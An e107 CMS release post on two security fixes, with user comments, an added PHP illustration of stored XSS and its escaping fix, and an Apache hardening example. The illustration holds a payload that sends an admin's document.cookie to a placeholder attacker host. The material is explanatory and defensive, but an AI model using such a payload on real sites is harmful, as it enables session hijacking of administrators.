Secunia Research contacted us a few days ago about two potential security issues. We have been working to reproduce and fix the issues, while they have held off making them public.

While I won't go into too much detail, I will say that one involves being able to upload a malicious file. It requires an odd set of preferences and a missing file to allow it to happen, though, so in our opinion the threat is pretty low.
The other was a JavaScript code injection: a user could inject JavaScript into a post, and it would run if an admin edited that user's post. This was only exposed if the site had the 'personal content manager' option enabled in the content plugin.
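The second issue is a classic stored script injection: content saved by a low-privilege user is later rendered, unescaped, inside a page that only an administrator opens. The snippet below is an added illustration written for this post, not e107's own code (the affected e107 code is not shown here). The post array, the function names and the edit-form markup are all assumptions; the attacker post body is constructed for the example.

```php
<?php
// Added illustrative example (not e107 code): stored script injection that
// fires when an admin opens a user-submitted post in an edit form.
// Function names, the $post layout and the form markup are assumptions.

// Constructed attacker-controlled post body. It closes the <textarea> the
// admin's edit page wraps it in, then runs script in the admin's session.
$attacker_post = [
    'id'   => 42,
    'body' => "Hello</textarea><script>document.location="
            . "'http://attacker.invalid/?c='+document.cookie</script>",
];

// Vulnerable form: the stored body is echoed into the edit page as-is.
function render_edit_form_vulnerable(array $post): string
{
    return '<form method="post" action="edit.php?id=' . $post['id'] . '">'
         . '<textarea name="body">' . $post['body'] . '</textarea>'
         . '<input type="submit" value="Save"></form>';
}

// Fixed form: every untrusted value is HTML-escaped at the point of output.
// ENT_QUOTES covers both quote styles, so the same helper is also safe for
// values placed inside attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_edit_form_fixed(array $post): string
{
    return '<form method="post" action="edit.php?id=' . (int) $post['id'] . '">'
         . '<textarea name="body">' . h($post['body']) . '</textarea>'
         . '<input type="submit" value="Save"></form>';
}

// Crude check used only to show the difference: is there a live <script>
// element immediately after the textarea the body was supposed to stay in?
function contains_live_script(string $html): bool
{
    return (bool) preg_match('#</textarea>\s*<script#i', $html);
}

foreach (['render_edit_form_vulnerable', 'render_edit_form_fixed'] as $renderer) {
    $html = $renderer($attacker_post);
    echo $renderer, ': ',
         contains_live_script($html) ? 'script would execute' : 'script is inert',
         PHP_EOL;
}
```

The point of the check is where the escaping happens: escaping on input (for example stripping `<script>` when the post is saved) is easy to bypass and breaks legitimate content, whereas escaping every untrusted value at the moment it is written into HTML is what closes the hole regardless of what the user managed to store. Whether the page is an admin-only screen makes no difference; the admin's browser is exactly the one the attacker wants the script to run in.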

Both have now been fixed. Thanks again to Secunia for pointing them out to us.

Of course, the release also includes all other bug fixes that have been committed since the last release.

Link to downloads here: http://e107.org/edownload.php

The full list of changes is in the changelog.


Comments

15 Apr 2010
  • e107 Support Team Leader
Well that caught me by surprise this morning.

Thanks for making e107 as secure as possible everyone.
16 Apr 2010
Thanks for the update on the ball, as usual.

Just a quick question. After updating, my file checker is throwing up the same errors (across 3 sites, all on different servers) in ver.php and user.php as after the v0.7.19 update. Has this not been corrected since the last release?

Many thanks again for your superb work
16 Apr 2010
  • e107 Support Team Leader
I was using SVN and had a lot of files that weren't validating against the v7.20 core image, so I replaced those files from the full release and all is now fine.

Last time there was an issue with McFly's timezone when creating the build, if my memory serves me right, so my advice would be to use the core image file from the v0.7.12 full zip and replace any 'non-validating' files from that as well.
rgk
17 Apr 2010
  • e107 Support Team
ty for the release
18 Apr 2010
Thanks !
Upgrade done on 3 sites without any problem
18 Apr 2010
I seem to have lost some of my text edits on custom pages. I can't get a line return to work. It was okay before the upgrade. My text rendering is set to WYSIWYG.

Sorry if this comment should have gone elsewhere...
18 Apr 2010
  • e107 Site administrator
  • e107 Core developer
  • e107 Translation Team Leader
@RNS: please post upgrade/installation problems in the forum: [-link-]
19 Apr 2010
Secunia is saying that 6 of 26 advisories are still unpatched. Is this just a case of them not being updated on the patches, or are there still issues which remain unsolved?

Either way, it isn't good for the e107 image.
19 Apr 2010
  • e107 Support Team Leader
If there were known issues, they would have been fixed for v0.7.20
19 Apr 2010
Everything working well. I did a .18 to .20 update. No problems found. Thanks for the update!
19 Apr 2010
Updated without problems

Here is the translation into Spanish.
19 Apr 2010
2dopey said:
"If there were known issues, they would have been fixed for v0.7.20"

I figured as much, but felt it worth mentioning.
19 Apr 2010
  • e107 Main site administrator
  • e107 Core developer
@migs - have certainly looked at all those vulnerabilities, and pretty certain all fixed (some rather a long time ago) - just wanted to be sure before contacting Secunia. Got rather diverted by more immediate threats!
19 Apr 2010
Steve, that's exactly what I thought, hence my first question being about whether it was just a case of updating Secunia.

Whilst I was there, I had a scout around. Joomla and Drupal show no outstanding advisories for the core files, but seem to have a ton of issues with plugins. Wordpress has about half a dozen outstanding for the core and a million widget issues. Presumably the plugin/widget issues are 3rd party.
20 Apr 2010
All working. Well done, everyone.
22 Apr 2010
Updated without problems, thanks!
24 Apr 2010
I received this email today. how would I know if this is covered in this update?

Hello,

Your account, xxxxxxx has files which are infected with viruses or are otherwise concerning.

You can find a list of potential problem files below.
Contact [email] if you have any questions.

Note that files named core.* can be deleted outright. Most files that mention 'broken executable' are safe to retain. If any of the below files references trojan, bot or worm, it must be removed immediately and the software within your account must be kept up to date to prevent any future exploitations.

/home/xxxxxx/public_html/e107_plugins/calendar_menu/readme.pdf: Exploit.PDF-21809

Thank you,
Fused Network Support
25 Apr 2010
That looks like a false positive from a clamav scan...
Ask the server administrators to update their anti-virus scanners.
13 May 2010
About time this was patched!

I had someone upload that "malicious file" to my server. Logs here: [-link-]

A few ways to protect yourself:
1) In your php.ini file, set "allow_url_fopen = Off" and "allow_url_include = Off", since the hack depends on them.
2) In Apache's httpd.conf, disable the PHP engine in EVERY folder that has write access.
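For readers who want to see what the two steps in the comment above look like in practice, here is an added configuration example; it is not from the original post and not e107's own configuration. The directory path is an assumption (substitute whatever directories your web server user can write to, such as the e107 upload and cache folders), and the `php_admin_flag` lines apply to mod_php only: with PHP-FPM the same settings go in php.ini or the pool configuration instead.

```apache
# Added example, not part of the original post or of e107.
# Paths are assumptions; apply the <Directory> block to every tree the
# web server can write to.

# Step 1, set from the server config rather than php.ini (mod_php only).
# php_admin_flag cannot be overridden from .htaccess or by ini_set().
php_admin_flag allow_url_fopen Off
php_admin_flag allow_url_include Off

# Step 2: no PHP execution in a writable directory, so an uploaded .php
# file is served as plain text (or not at all) instead of being run.
<Directory "/var/www/example/e107_files/public">
    # mod_php: switch the interpreter off for this tree.
    php_admin_flag engine off

    # Belt and braces: refuse to serve anything that looks like a script,
    # in case a handler for these extensions is mapped elsewhere.
    # (Apache 2.2 would use "Order allow,deny" / "Deny from all" here.)
    <FilesMatch "\.(php|phtml|php[3-7])$">
        Require all denied
    </FilesMatch>

    # No CGI or server-side includes from here either.
    Options -ExecCGI -Includes
</Directory>
```

After reloading Apache, confirm the effect rather than assuming it: drop a file containing `<?php phpinfo(); ?>` into the protected directory, request it, and check that the response is a 403 (or the literal source text), not a rendered phpinfo page. Remove the test file afterwards.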

Comments are locked